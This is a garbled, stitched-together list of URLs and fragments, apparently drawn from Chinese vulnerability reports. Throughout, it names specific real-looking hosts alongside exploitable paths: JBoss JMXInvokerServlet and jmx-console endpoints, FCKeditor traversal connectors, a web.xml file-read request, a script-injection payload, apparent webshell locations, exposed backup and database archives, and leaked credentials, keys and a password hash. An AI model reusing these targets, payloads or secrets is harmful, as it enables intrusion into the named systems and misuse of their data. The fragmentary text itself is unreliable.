http://www.bsfcpg.com/setting/xgmm_dowith.asp http://monitor.101.com/ http://oa.yunzao.cn/oa.upload.tar.gz http://www.itrust.org.cn/)敏感信息泄露,服务器早期曾经被人留下后门。可直接进入dede管理后台,dede后台可以直获取webshell的。 http://**.**.** http://www.zxhsd.com/search/book_search.jsp?keyword=1 http://www.zxhsd.com/group/search_article.jsp?keyword=123 http://www.zxhsd.com/ttc/ttcDetail.jsp?spbs=2438853 http://www.zxhsd.com/ttc/ttcList.jsp?lb=JQA&lbmc=%C9%FA%CF%CA%B9%FB%CA%DF http://www.zxhsd.com/Club/Register_check.jsp?dlm=hello http://www.zxhsd.com/group/zxly.jsp?currpg=1&keyword=123 http://b2g.zxhsd.com/servlet/fwdAjax?qwdg=0&dz_county=1&lx=1 http://zxhsd.com/images/ad/ http://zhoushan.zxhsd.com/images/ http://yuhang.zxhsd.com/images/ http://xiaoshan.zxhsd.com/images/ http://xianju.zxhsd.com/images/ http://www.263.net/263/onlineTopUp/ http://paycenter.263.net/pay/payway_payGetWay.action?serviceUserCode=263qytxvboss&key=5c59aaa1e2532fdf2db725e80e1fa742&productCode=vbossP&payMoney=0.01&orderId=1000055070&buyer=test@domain.com&ejd=994c63e1d017331ebb0a81ca51cbcd93 xxx.kuwo.cn/g/st/PersonalCenter?act= http://sxd.kuwo.cn/g/st/PersonalCenter?act=%22;alert%28%275%27%29%3C/script%3E http://ts.kuwo.cn/test.php http://jx.swufe.edu.cn/sc8/page/schoolspace/academy.do http://111.12.219.18/Login.aspx) http://wooyun.org/bugs/wooyun-2015-098718 http://221.2.154.142:8080/index.php http://220.231.55.63/index.do http://220.231.55.63/index.do http://zhixingche.me/user/index http://211.69.144.70/ http://211.69.144.70/login.aspx?sysId=2 www.lefu8.com http://220.189.240.216/ctkj_acl/html/login.html inurl://///?/youku./@password www.xa-police.gov.cn/_ www.xa-police.gov.cn/www.zip http://czj.daqing.gov.cn/Admin_Login.asp http://czj.daqing.gov.cn/bszn.asp?classid=8 http://czj.daqing.gov.cn/bszn.asp?classid=8 http://czj.daqing.gov.cn/bszn.asp?classid=8 http://115.29.3.122:8080/ http://www.1337day.com/exploit/23480 http://www.lntu.edu.cn/hisphoto.asp?id=18 http://chl.yinxunpay.com/login.action http://zhixingche.me/site/search-post?type=0&keyword=%22 http://cg.chaoxing.com/set_password.aspx http://elearning1.zte.com.cn/DistanceLearning/Application/CourseCenter/CourseBasicInfo.aspx?FromSource=20&CourseNo=55522&ApprovalFlag=&RedictToOtherCourse=false http://elearning1.zte.com.cn/DistanceLearning/Application/CourseCenter/CourseBasicInfo.aspx?FromSource=20&CourseNo=55522&ApprovalFlag=&RedictToOtherCourse=false http://221.0.180.142 http://221.0.180.142/jmx-console/ http://221.0.180.142/invoker/JMXInvokerServlet http://www.tax361.com:7001/law/GetChannelList.jsp?id=700000000002 http://bbs.caissa.com.cn/?330000 http://bbs.caissa.com.cn/?335000 http://202.102.221.85/toLoginPage.do?reurl=http%253A%252F%252F202.102.221.85%252FtoIndexPage.do zmsn.jjh.k618.cn/index.php?r=post/search&tit= zmsn.jjh.k618.cn/index.php?r=post/search&tit= https://account.meilishuo.com https://218.94.123.58/portal_default/vone/portal/index.html http://www.cqitc.cn/ http://ipc.cqitc.cn/PcPrj/pcPrj_list.action http://cc.cqitc.cn/VcPrj/vcPrj_list.action http://cp.cqitc.cn/Business/Index.action http://nis.cqitc.cn/Business/query/LoginQuery.action http://nis.cqitc.cn/Business/query/LoginQuery.action http://sps.sysu.edu.cn/admin/login.aspx http://zhixingche.me/post/208 http://www.hsfjqqcz.com/page/login!login.action http://220.163.114.112/ynsiq/ http://220.163.114.112/jmx-console http://220.163.114.112/invoker/JMXInvokerServlet http://www.wlmqwb.com/ http://w.wlmqwb.com//about/about.html http://cms.wlmqwb.com/vote/00/1.htm http://cms.wlmqwb.com/vote/00/file/help1.aspx http://wap-ebank.pingan.com/weixin/modules/register/index.html?from=login https://wap-ebank.pingan.com//xinyongka/public.do?operationType=getPwdKey http://wap-ebank.pingan.com//weixin/js_lib/tools/unionrsa.js cn:9090 http://im.tebon.com.cn:9090/uploadfile?istrade=istrade&filename=../WEB-INF/web.xml http://im.tebon.com.cn:9090/FCKeditor/editor/filemanager/browser/default/browser.html?Connector=connectors/jsp/connector http://220.248.78.86:9090/FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=../ http://220.248.78.86:9090/FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=../upload http://220.248.78.86:9090/uploadfile?istrade=istrade&filename=../upload/testucstar.jspx http://221.232.130.116/login.do http://www.jhun.edu.cn/ncontent.asp?id=111931&am http://219.132.155.50/ http://219.132.155.50/invoker/JMXInvokerServlet http://116.112.14.74:8080/KX_SSH_JZNY/login!showLogin.action http://58.61.160.40/ http://portal.51iwifi.com/site/portal/?dev_id=RADIUS-RADIUS-20150204-63ee0d57 http://27.223.70.96:8080/admin/backendUi!login.do http://oa.yunzao.cn/admin/user-info-edit http://drops.wooyun.org/tips/2031。 http://zhixingche.me/ http://zhixingche.me/post/375 http://oa.chinagas.com.cn/new/new.rar http://oa.chinagas.com.cn/new/add_fapiao.aspx找到fck编辑器 http://www.hb139.com.cn http://www.hb139.com.cn/aopp/org/login.do http://www.whmzj.gov.cn/shzz/mfml.aspx?page=0&property=1 http://www.sregc.com.cn/news-list.php?type=gsnews&oid=333 http://service.shmetro.com/zxjl/index.htm http://**.**.**/admin.php http://218.60.144.109/ http://218.60.144.109/invoker/JMXInvokerServlet http://**.**.**/login.jsp http://bbs.3gsc.com.cn//.svn/entries an:3316 http://adm.suning.com/server-status http://card.suning.com/server-status http://cg.suning.com/server-status http://cloud.suning.com/server-status http://list.suning.com/server-status http://lms.suning.com/server-status http://msg.suning.com/server-status http://product.suning.com/server-status http://search.suning.com/server-status http://shop.m.suning.com/server-status http://yp.suning.com/server-status http://**.**.**/cy/cy.detail.phppid=99838 inurl:////?/zt.4399/@UserName/@password www.zip http://www.cs-travel.com/vote/vote.php?prjid=3 http://ahaq.hrss.gov.cn/news_show.asp?id=4349 http://ahaq.hrss.gov.cn/manage/login.asp http://ahaq.hrss.gov.cn/news_show.asp?id=4349 http://ahaq.hrss.gov.cn/news_show.asp?id=4349 http://www.vipstudy.com.cn/ http://www.vipstudy.com.cn/www.vipstudy.com.cn.zip http://www.vipstudy.com.cn/phpcms/libs/nwxs.php http://libao.1006.tv http://www.chnphoto.cn//.svn/entries http://photo.chnphoto.cn//.svn/entries http://www.chnphoto.cn/test.php http://photo.chnphoto.cn/phpinfo.php http://libao.1006.tv/codedetail/282/1 http://www.vhall.com/action.php?module=mywebinar.saveimage http://www.vhall.com/action.php?module=mywebinar.saveimage http://www.vhall.com/action.php?module=mywebinar.saveimage http://tg.9you.com/ http://www.cqmetro.cn/wwwroot_release/crtweb/yyfw/ckwd/index.shtml www.1006.tv/然后拉到下面看到有妹纸 www.1006.tv/news/218399 http://csair.95516.com http://d.shiwan.com http://d.shiwan.com/streams/pptv/sphinx.html http://www.wooyun.org/bugs/wooyun-2015-0108194/trace/9fdbb3f803e5683ac9a460f49c702d93 http://www.newvane.com.cn/index.php?ac=article&at=list&tid=151 http://121.8.153.10 http://218.1.73.18 http://exam.kingdee.com http://222.68.193.118 http://user.shiwan.com/myMsgWithOne?page=1&uid_with=1 http://101.226.164.193/loginIn.action http://imed.hbcf.edu.cn http://bbs.shiwan.com/subject/115515 http://bbs.shiwan.com/subject/188910 http://bbs.shiwan.com/subject/115515 http://www.strongsoft.net/DMenu.aspx http://www.zhuoyue.sdu.edu.cn/ http://1.202.195.218/xxnm/ http://www.zjgrc.com/userControls/webPic/pic_click_count.aspx?advertRegion_cd=zjg_AD11 http://manager.ranknowcn.com/ http://211.138.29.206:8080/login.jsp http://www.xmgd.com/webepg/webepg.jsp?id=437653228 http://3c.ecare365.com/newtc2/ordered.aspx http://211.99.228.163:8080/invoker/JMXInvokerServlett http://58.68.225.208/ http://219.141.214.6/ http://219.141.214.6/admin-console http://116.114.83.134/ http://mobile.coinvs.com/ProjectView/detailEx/pid/1114 http://mobile.coinvs.com/ProjectView/detailEx/pid/1114 http://baike.baidu.com/link?url=JT9Fdhe5EHCQyau_8IOv7vlwZ5mA4XjSfT8_UiMzoE4Zj8Pgo-sTsjh7Msej0ly40N6GClrhg6m-2uzkUfpYQa url:http://www.zsmz.com http://www.zsmz.com/memberJson/sendMobileCode username:athena2010 password:3df00baa82e3266d MD5:520xccmlp http://www.hndk.hunan.gov.cn/ http://**.**.** http://218.24.167.26/fromLogin/fromLoginSave.jsp http://218.24.167.26/fromLogin/manageLogin.jsp?usertype=3 http://www.luhui.net/Product.asp?Sort_ID=3 http://www.wushang.com/member/messagedetail.jsp?msgid=msg_1660000 http://oms.fruitday.com/ https://mail.euchost.com/owa/auth/logon.aspx http://219.153.9.73:8080/submitted/login.action http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd http://www.w3.org/1999/xhtml http://www.shiwan.com/app/531280 http://yunshangdian.com/ http://srm.tclking.com www.job1001.com//myNew/down.php?filename=../inc/indexCache/trade/index.php http://zhihui.189hz.com/login_login.action http://zhihui.189hz.com/ma3.jsp http://zhihui.189hz.com/pic/.svn/entries http://zhihui.189hz.com/pic/2012/.svn/entries http://zhihui.189hz.com/content/.svn/entries http://zhihui.189hz.com/web/.svn/entries http://bbs.shiwan.com http://xb2.hbcf.edu.cn/law/plus/recommend.php存在注入,可直接获取管理账号密码 http://my.gfan.com/info.php URL:http://my.gfan.com/account http://bbs.shiwan.com/subject/188803 display:none http://61.130.72.149:8001/zkweb/ http://61.130.72.149:8001/zkweb/zkLogin_kl.do http://www.1006.tv/center/blzz http://**.**.**/gjfpb/ http://124.115.170.79:9080/pis/ http://www.egova.com.cn/ http://success.xcmg.com/detail.jsp?myid=121 major:73指计算机类(其他的可以在大街网看出来) livicity:510100 http://211.167.226.120/index.jsp http://211.167.226.120/jmx-console/ http://dingdan.fday.co/ http://dingdan.fday.xyz/】 http://noviciate.people258.com/News/BulletinList.aspx?newsType=27 http://noviciate.people258.com/News/NewsList.aspx?newsType=26 http://search.people258.com/SearchResult.aspx?AreaNamesContent=%E5%98%89%E5%85%B4&area=3304 http://search.people258.com/SearchResult.aspx?KeyType=3&AreaNamesContent=%E9%80%89%E6%8B%A9%2F%E4%BF%AE%E6%94%B9&KeyWord=%E4%BA%BA%E5%8A%9B%E8%B5%84%E6%BA%90&area= http://search.people258.com/SearchResult.aspx?Release=-1&keyType=3&keyword=%E4%BA%BA%E5%8A%9B%E8%B5%84%E6%BA%90 http://manager.people258.com/auth.rar http://www.sms.com.cn/Blog/index.php?cl=53 http://211.157.16.118/ http://211.157.16.118/jmx-console/ http://210.14.78.250/api/gettruckorders.aspx?date=2014-12-08 http://210.14.78.250/Api/Delivery/Waves.aspx?day=2014-11-28 http://192.168.10.205:8088/third/getSdBatchs?day=2014-11-28 http://210.14.78.250/Api/Delivery/GetWaveById.aspx?id=2702 http://192.168.10.205:8088/third/getBachById?id=115 http://210.14.78.250/Api/Delivery/WaveOrders.aspx?banci=3243 http://192.168.10.205:8088/third/getOrderDvByBid?waveid=115 http://210.14.78.250/Api/Delivery/GetOrderByWaveId.aspx?waveid=3243 http://192.168.10.205:8088/third/singleRow?waveid=70 http://210.14.78.250/api/GetByBarCode.aspx?type=boci&barcode=00007-141129 http://192.168.10.205:8088/wms/getOdBycodes?type=boci&barcode=1000030882 http://210.14.78.250/api/OrderSearch.aspx?truck=20141128-sh-5-006&waveid=3243 http://210.14.78.250/Api/gettruckorders.aspx?codes=00007-141129 http://210.14.78.250/api/gettruckorders.aspx?date=2014-12-08 http://218.6.160.236:8081/mhcj/login.action http://mall.sh.189.cn/mall/tao-number.html http://www.syst.com.cn/cn/download.aspx?id=407 http://www.syst.com.cn/cn/magazine.aspx?id=136 http://www.syst.com.cn/cn/magazine_info.aspx?id=791 http://www.syst.com.cn/cn/quality.aspx?parentid=133 http://www.syst.com.cn/Editor/eWebeditor/admin/login.aspx http://111.39.218.85/Admin/admin_login.asp http://218.94.36.160:81 http://180.153.139.84:11381/ydccp/login.jsp http://wms.fday.co/ http://wms.fday.xyz/ http://wms.fruitday.com http://wms.fday.co/order/pack/progress?batch_id=5970 http://122.144.167.54:38080/wms/getDeliveryOrders?deliver_method=10&warehouse=sh&day=2015-01-11 http://122.144.167.54:38080/wms/getDeliveryOrders?deliver_method=10&warehouse=sh&day=2015-01-10 http://122.144.167.54:38080/wms/getDeliveryOrders?waveid=150110002_sh_DSF_SF_ZB http://122.144.167.54:38080/wms/getDeliveryOrders?orders=1000388815,1000388886 http://122.144.167.54:38080/third/syncExpCode http://cang.fday.co/ http://joshell.coding.io/joshell mysql://qzgIlkpXmNtrwYW3:EZvyGidCWMg***@10.9.1.***:3306/cf_082c8f00_9f4f_481a_b6f8_***?reconnect=true","jdbcUrl":"jdbc:mysql://10.9.1.***:3306/cf_082c8f00_9f4f_481a_b6f8_***?user=qzgIlkpXmNtrwYW3&password=EZvyGidCWMg***"}}],"redis-2.6":[*******],"filesystem-1.0":[{"name":"commy-file","label":"filesystem-1.0","tags":["filesystem","filesystem-1.0","Persistent http://home.fruitday.com/ http://fday.co/ http://home.fruitday.com http://wms.fruitday.com http://fenche.fruitday.com http://oms.fruitday.com http://home.fday.co http://dingdan.fday.co http://home.fday.co http://wms.fday.co http://fenche.fday.co http://wms.fday.co http://dingdan.fday.co http://wms.fday.co http://cang.fday.co http://cang.fday.co http://omstst.fruitday.com http://wms.fday.xyz http://home.fday.xyz http://fenche.fday.xyz http://dingdan.fday.xyz http://cang.fday.xyz http://oms.fruitday.com/ http://omstst.fruitday.com http://oms.fruitday.com http://home.fday.co http://home.fday.xyz http://wms.fday.co http://211.157.16.118/ http://211.157.16.118/scripts/FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=../../ http://202.108.124.146/login.asp http://202.108.124.146 http://gg.yy.com/admin/html/userOrder.html http://dev2.user.anzhi.com:9201/ http://www.jygb.cq.cn http://my.wust.edu.cn/ http://my.wust.edu.cn:8081/jdsgy/dede/index.php http://my.wust.edu.cn:8081/jdsgy/uploads/1.php http://dsp.cig.com.cn http://www.zjtax.gov.cn/ids/admin/notifycation/list.jsp http://www.zjtax.gov.cn/ids/admin/user/list.jsp http://www.zjtax.gov.cn/ids/admin/sys/system/editSysParaCfg.jsp http://210.38.57.70:8180/eWebEditor_V5.0/admin/login.jsp http://gs.scu.edu.cn/web.rar http://gs.scu.edu.cn/manage/tab/ewebeditor/admin/login.aspx?action=login http://60.30.66.197/ums/ http://218.246.22.61/index_search.aspx?ShowTitle=1 http://222.240.192.140/bbs/ http://222.240.192.140/bbs/Manage/default.asp http://www.cppsu.edu.cn/jiaxiao/ruler_view.cfm?id=40 http://www.cppsu.edu.cn/jiaxiao/ruler_view.cfm?id=40 http://sqlmap.org http://203.195.204.80/admin-console http://passport.cocoachina.com/sso/forget_pass http://222.240.192.140/xt/DataBase/DB.mdb http://222.240.192.140/xt/login.asp http://114.113.149.161:8081/sso/ssologin!ssojs.action http://www.chinacreator.com/ http://hnnjtg.net/comm_front/yqlj/addLinks_do.jsp?siteid= http://www.hncks.com/comm_front/yqlj/addLinks_do.jsp?siteid= http://fz.hnagri.gov.cn/comm_front/yqlj/addLinks_do.jsp?siteid= http://www.hnnyzz.com/comm_front/yqlj/addLinks_do.jsp?siteid= http://www.hnagri.gov.cn/comm_front/yqlj/addLinks_do.jsp?siteid= http://lebi.17500.cn/experts/results/index/mtype/schs/eid/2514* http://www.ver.cn/news/news_detail.php?col_id=3234 http://nczx.yonyou.com/SubModule/role/ http://hw.gpsisp.com/gps/doif/myLogin.jsp http://www.appstar.com.cn/appstar/manage/upload/ads/1429335160287.jsp www.tjbtn.net的信息收集 http://221.129.243.165:8080/login.do http://www.anmai.net:81/login.aspx http://ps.imau.edu.cn/anmai/login.aspx http://gyxx.cmjy.sh.cn/anmai/login.aspx http://www.jukui.com/ANMAI/login.aspx http://www.tlxlhzx.com/ANMAI/login.aspx http://www.whir.net/index.html http://oa.tlchem.com.cn:7001/ http://oa.elyl.com.cn:7001// http://61.132.136.122:8080/ http://218.92.72.69:7001/ http://219.139.191.200/ http://bbs.qjvpn.com.cn/admin.php http://mszj.jingjiang.gov.cn:8888/jjmszj/admin/fileUpload-downloadTAnnex.action http://www.whjdsc.com http://www.strongsoft.net/ http://ldfxb.com/ http://61.153.79.222:3050/ http://www.jnfxb.com/ http://122.228.162.250:3050/ http://syq.cxwater.cn/ http://www.17ugo.com/user.php?act=get_password http://bb.hitwh.edu.cn:90/news_index.jsp?id=3 http://bb.hitwh.edu.cn:90/wap/classroom_search2.jsp http://bb.hitwh.edu.cn:90/wap/showclass.jsp http://bb.hitwh.edu.cn:90/news_index.jsp?id=3 http://sqlmap.org http://www.itophome.com//technique.aspx?sea=1&v=VkO1HZa5 http://dev.open.youzu.com http://dev.open.youzu.com/site/reg http://dev.open.youzu.com/email/send/type/1/cId/62e50c508258e9618f9298b568f29acc/act/1 http://dev.open.youzu.com/email/activation/u/邮箱/type/1/cId/返回的字符串/act/1/t/时间戳 http://dev.open.youzu.com/email/activation/u/test%40wooyun.org/type/1/cId/62e50c508258e9618f9298b568f29acc/act/1/t/1429353880 http://dev.open.youzu.com/findPwd/resetPwd/u/邮箱/type/1/cId/返回的字符串/act/1/t/时间戳 http://www.wzbtv.com/pic/Newsview.asp?id=38 http://dlx.lenovo.com/dlx3/rcmweb/default.aspx http://dlx.lenovo.com http://dlx.lenovo.com/dlx3/TSR.Web.OutSide/UI/NewStorefront/addSalePlace.aspx?p=32165&level=-1 http://59.175.146.55:81/OAapp/WebObjects/OAapp.woa http://www.makita.com.cn/product_show.php?id=23 http://www.makita.com.cn/product_show.php?id=23 http://www.makita.com.cn/product_show.php?id=23 http://www.makita.com.cn/product_show.php?id=-23 http://www.pinker365.com/reg.html http://www.gxntjz.com:8088/ http://183.203.150.20:8000/ http://service.ltpop.gov.cn/ http://service.zzxpop.gov.cn/ http://service.zyxpop.gov.cn/ http://service.akpop.gov.cn/ http://service.hsrk.gov.cn/ http://service.ltjsj.gov.cn/ http://service.ltpop.gov.cn/Services/MarriageLicenceDo/0fb09558794bd94e/0301/610122104206.shtml http://service.ltpop.gov.cn/Services/MarriageLicenceDo/0fb09558794bd94e/0301/610122105206.shtml inurl:http://www.zhaomu.com/Manage/ http://gm.ns.youzu.com/data/ http://gm.ns.youzu.com/html http://www.10jqka.com.cn/ia/index.php~ http://www.10jqka.com.cn/ia/mod.php~ http://www.10jqka.com.cn/modules.php~ http://www.10jqka.com.cn/modules/toplist/get_js.php~ http://www.10jqka.com.cn/modules/trade/get_user_trade_info.php~ http://www.10jqka.com.cn/kid_mammon/config.inc http://www.jushanghui.com/ http://www.bjbb.com/index.shtml http://**.**.**/vmain/login.jsp www.ztesoft.com:808 www.ztesoft.com:808/index.php?ac=form&at=list&fgid=2&jn=%E5%B8%82%E5%9C%BA%E9%A1%B9%E7%9B%AE%E7%AD%96%E5%88%92%E7%BB%8F%E7%90%86%E3%80%80 http://222.180.173.73/index.aspx http://www.999netsafe.com/ http://wap.ltjsj.gov.cn/ http://wap.hsrk.gov.cn/ http://wap.zyxpop.gov.cn/ http://wap.zzxpop.gov.cn/ http://wap.ltpop.gov.cn/ http://wap.ltjsj.gov.cn/ServicesDo.aspx?c=0301&v=610115001001 http://wap.hsrk.gov.cn/ServicesDo.aspx?c=0303&v=610823102204 http://www.zznyxxxt.gov.cn:6001/FQSSYSWEB/ http://www.zznyxxxt.gov.cn:6001/FQSSYSWEB/UserControl/ImgUpload/ImgUpload.jsp http://61.154.9.6:8119/manage/user-manage!client_loginOut.action http://www.tlsp.net/FCKeditor/editor/filemanager/connectors/jsp/upload.jsp?Type=File http://61.139.105.105:8008/IMLoginServlet?uid=1&pwd=1 http://61.139.105.105:8008/persionTreeServlet?bmdm=1 http://61.139.105.105:8008 http://124.128.96.98:8001 http://www.jmsxc.com:7001 http://210.44.112.101 http://210.41.128.120:8002 http://web72283.5udns.cn http://bjunicom.weibiz.cn/Handler/Activity_Charge.ashx http://www.scjb.gov.cn:11212/invoker/JMXInvokerServlet http://www.baidu.com/s?wd=site%3A%3Cscript%3Ea%3D%2F*bbbbbbbbbbbb*%2Falert%281%29%2F%2F http://shjsb.gov.cn/invoker/JMXInvokerServlet http://www.5150w.cn/ http://lengku.5150w.cn/ https://github.com/puppyred/lvmama_pet/blob/master/Super_back/src/config/edm_config.properties edu.189.cn/eip-platform-sso-server/login.jsp http://s.edu.189.cn/sns/t/bk_Edit.aspx?LeId=2352 http://tieba.baidu.com/godthread/likePost http://**.**.**/findPassword.action http://nubia.cn/demo.jsp http://nubia.cn/index2.jsp http://top.vcooline.com:8183/redmine/issues web.sh.ptt.189.cn/company/login.do http://m.ilvxing.com/usercenter/user/login(google浏览器,其他浏览器不兼容。。。。。。。) www.ilvxing.com http://zone.suning.com/review/json/product_reviews/000000000126148820--total-g-810999---3-4-getItem.html?callback=getItem http://image.suning.cn/uimg/cmf/cust_headpic/0000000000_01_60x60.jpg http://my.tantuls.com/jsp/init.action http://119.60.5.20/invoker/JMXInvokerServlet http://fenche.fday.xyz http://222.174.163.3:10066/ http://222.174.163.3:10066/存在jboss命令执行漏洞 http://222.174.163.3:10066/myname/index1.jsp APhBZznXIxLQlioi8GsMn1:15604:0:99999:7 http://www.gdmo.cn/weather-gdmo/weathervideo/weather-video!init.action http://117.27.156.8:8000/ http://117.27.156.8:8000/myname/index.jsp http://wooyun.org/bugs/wooyun-2010-091951 http://221.232.147.74:81/ http://eqxiu.com http://www.suning.com.cn/suning.zip http://www.smecq.gov.cn/ http://www.smecq.gov.cn/news/currentnews/CurrentNewsCon.aspx?content_id=74663 http://cqncp.smecq.com/web/?page=content&cid=1099 http://218.70.15.10:1666/jmx-console/ www.glzfgjj.cn:8136 https://www.wacai.com/user/um_saveUserInfo.action http://zj.189.cn/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=%2F../ https://github.com/jnccClub/jnccinfo/blob/8b81d96d5719331388254fd0edcb94be23aa739c/src/main/resources/cfg/mail.properties http://oa.ahhr.com.cn/manage/Login.aspx http://hq.fruitday.com:88/login/Login.jsp?logintype=1 https://github.com/Moirai7/TYT/blob/f9b42524b93a9dc7b6d744ea69ab5dd89d545482/data/conf/config.php http://info.gnete.com/ http://zhuzher.vanke.com/uip/vhome/user/checkAccount.do是校验用户是否存在的请求。绕过这步点方法有两个: http://zhuzher.vanke.com/uip/messagesend/smsSend.do是短信校验码的请求, www.wooyun.org,结果后面就再也发不出短信了,I’m www.yczfgjj.com http://110.249.253.5:8000/provinceIndexAction.action http://110.249.253.5:8000/jmx-console/ http://210.14.78.250/db.rar http://www.hbcz.gov.cn:8080/arkcms/guestbook/index.jsp?site=null&siteID=8a8080820bb43e5a010bb478c73a062e&ID=98434 http://it.nwpu.edu.cn/login2.jsp?activityid=91 http://183.62.50.21:7777/Eisserver/ http://183.62.50.21:7777/jmx-console/ http://www.gzipo.gov.cn/admin/jsp/cms/content/content_manage_entity.jsp?parentEncode=001&orderField=cms_content.VERSION_ID&isDesc=Y http://pan.baidu.com/s/1kT02Dy3 http://www.sccom.gov.cn/xxfb/fbmanager/moInfo.do?info=33685 www.sjzjyhd.gov.cn http://www.sjzjyhd.gov.cn https://github.com/doloveme/coremailtest/blob/ca175b8b6b22aae8d57ae424288f5eab3ff23029/coremail/src/main/java/com/test/MyClass.java http://tuan.wl.cn/ http://hssskl.tju.edu.cn/teachers.asp?id=47  http://hssskl.tju.edu.cn/MainTain/ inurl:http://mail.miit.gov.cn:8080/login.php?F_authid= http://222.143.25.120:81/tjxt/pages/czy/login.jsp http://222.143.25.120:81/invoker/JMXInvokerServlet http://yun.zjer.cn/portal/index.php?a=init&c=help_search&catid=29&keywords=1%27%22&m=content&siteid=1 wecms.wecook.cn/User/index.html_ http://**.**.**/Admin/User/resetPwd/id/267157.html_ http://**.**.**/Admin/AuthManager/usergroup_name=%E7%B3%BB%E7%BB%9F%E7%AE%A1%E7%90%86%E7%BB%84&group_id=8_ http://**.**.**/Config/edit/id/4.html_ http://140.207.254.30:81/itsm/ http://140.207.254.30:81/invoker/JMXInvokerServlet http://www.jj.hc360.com/ http://335882.m.weimob.com/webreserve/ReserveMyBook/rid/32639/wechatid/o91j7jjKmfaamfF5dIo5-EBJacdo 获取所有参与的信息,点击其中的链接可看到用户的详细资料,例如电话号,实名。并且可以随便随便修改用户的资料或取消用户参与的资格。使用户参与活动失效。严重的是数据信息可以轻易批量抓取到,让骗子可以用来行骗。 http://twy.zjedu.org/common/countStat.php?infoId=6540,注入点infoId http://twy.zjedu.org/common/info_list.php?page=0&colsn=002006000,注入点colsn http://www.gy.yn.gov.cn http://www.rgrcb.com/lxwm.php?class_id=184 http://**.**.**/ http://202.108.49.130/situjiaduotu.asp?formname=form2&editname=pic&uppath=xppic&filelx=xls http://**.**.**/xppic/yywlpic.asp http://222.42.53.23:81/ http://222.42.53.23:81/invoker/JMXInvokerServlet http://sljzw.hhu.edu.cn/fen/cata.aspx?type=75 http://sljzw.hhu.edu.cn/fen/showmore.aspx?newstype=2 http://sljzw.hhu.edu.cn/fen/cata.aspx?type com:443 https://mail.h isense.com/corem url:http://twy.zjedu.org/register.php http://182.151.205.225:88/?locale=zh_CN http://xnnrbz.xining.gov.cn/adduser.jsp http://www.scedu.net/user/print.php?mode=second&id=26345 http://bbs.gnete.com http://twy.zjedu.org/admin/admin.htm http://www.scbxyxtzypt.com:81/circbone/loginOnSign.action http://www.scbxyxtzypt.com:81/circbone/login.action http://www.scbxyxtzypt.com:81/circbone/login.action http://www.wandoujia.com/search?key=%E8%BD%A6%E6%98%9F%E4%BA%BA http://www.chinaz.com/start/2015/0313/389698.shtml http://chexr.cc/h/find.html联系车主这里有个功能,可以发信息,他会在APP和手机短信同时通知 http://182.151.205.225:81/ http://182.151.205.225:81/jmx-consoleing/ vip.septwolves.com/manage/web/index.php?app_act=club/user/member/order_detail&id=1 http://weixin.91160.com/index.php?c=user&a=login&time=1429448013 http://222.33.43.61/ http://110.249.129.242/Teacher/Index.aspx http://huiyuan.edu-pal.com/admin/ http://www.whaqjx.com/admin/login.aspx http://122.224.250.26:8182/ http://dhjx.1039.cn/Student/StudentLogin.aspx http://175.19.190.18:82/ http://218.58.52.102:83/Teacher/Index.aspx http://222.223.229.50:8080/Student/StudentLogin.aspx http://222.222.24.105:85/Student/StudentLogin.aspx http://219.145.135.190:88/Teacher/Index.aspx http://221.214.164.198:1039/Student/StudentLogin.aspx http://60.10.59.196:8090/Teacher/Index.aspx http://myjx.1039.net/Student/StudentLogin.aspx http://yueche.sjzxc.cn/ http://59.175.146.252/Teacher/Index.aspx http://182.92.70.91:270/Student/StudentLogin.aspx http://121.40.106.211:81/Student/StudentLogin.aspx http://211.157.186.169:8011/Teacher/Index.aspx http://www.zjkljjx.com/Teacher/Index.aspx http://wsyc.ybklzx.com/headmaster/HeadmasterLogin.aspx http://www.ylrsjt.com/Student/StudentLogin.aspx http://www.zljx.net:8080/Teacher/Index.aspx www.tybus.com http://portal.gdsgsafety.gov.cn:8080 https://portal.gdsgsafety.gov.cn:8443/cas/login?service=http%3A%2F%2Fportal.gdsgsafety.gov.cn%3A8080%2Fportal%2F http://portal.gdsgsafety.gov.cn:8080/invoker/JMXInvokerServlet https://portal.gdsgsafety.gov.cn:8443/invoker/JMXInvokerServlet http://chem.nenu.edu.cn/teacher_show.php?teacher_id=147&typeid=44 http://forum.open.com.cn http://forum.open.com.cn/admin http://forum.open.com.cn/admin/home/ www.gzszfgjj.com http://bbs.shiwan.com/bin/ajax_get_comment_list.php?flag=1&last_page=1&page=1&subject_id=1 http://222.143.53.129:8080/zzykt/ http://222.143.53.129:8080/admin-console http://222.135.76.130/searchbargain.aspx?bacqr=111&sfzh=111&bahth=111111 http://www.sysfgj.com/searchbargain.aspx?bacqr=111&sfzh=111&bahth=111111 http://www.jxanyifg.com/webbargain/searchbargain.aspx?bacqr=111&sfzh=111&bahth=111111 http://www.jlxfdc.com:8308/searchbargain.aspx?bacqr=111&sfzh=111&bahth=111111 http://www.ychfgj.com/ba/searchbargain.aspx?bacqr=111&sfzh=111&bahth=111111 http://www.ahjsfdc.com:81/searchbargain.aspx?bacqr=111&sfzh=111&bahth=111111 http://gpsfcgls.com/searchbargain.aspx?bacqr=111&sfzh=111&bahth=111111 http://www.bzfcj.gov.cn:9090/searchbargain.aspx?bacqr=111&sfzh=111&bahth=111111 http://www.lsfcj.com/searchbargain.aspx?bacqr=111&sfzh=111&bahth=111111 http://www.zyfcj.com:81/searchbargain.aspx?bacqr=111&sfzh=111&bahth=111111 http://61.134.55.211:8080/searchbargain.aspx?bacqr=111&sfzh=111&bahth=111111 http://117.141.124.166/searchbargain.aspx?bacqr=111&sfzh=111&bahth=111111 http://www.jxfgj.com:8081/searchbargain.aspx?bacqr=111&sfzh=111&bahth=111111 http://ba.snajfdc.com:8888/searchbargain.aspx?bacqr=111&sfzh=111&bahth=111111 http://61.184.26.226:8081/searchbargain.aspx?bacqr=111&sfzh=111&bahth=111111 http://www.mcfcj.com:8080/searchbargain.aspx?bacqr=111&sfzh=111&bahth=111111 http://www.suyufc.gov.cn/searchbargain.aspx?bacqr=111&sfzh=111&bahth=111111 http://222.173.253.198:88/searchbargain.aspx?bacqr=111&sfzh=111&bahth=111111 http://beian.ncfdj.gov.cn:8080/searchbargain.aspx?bacqr=111&sfzh=111&bahth=111111 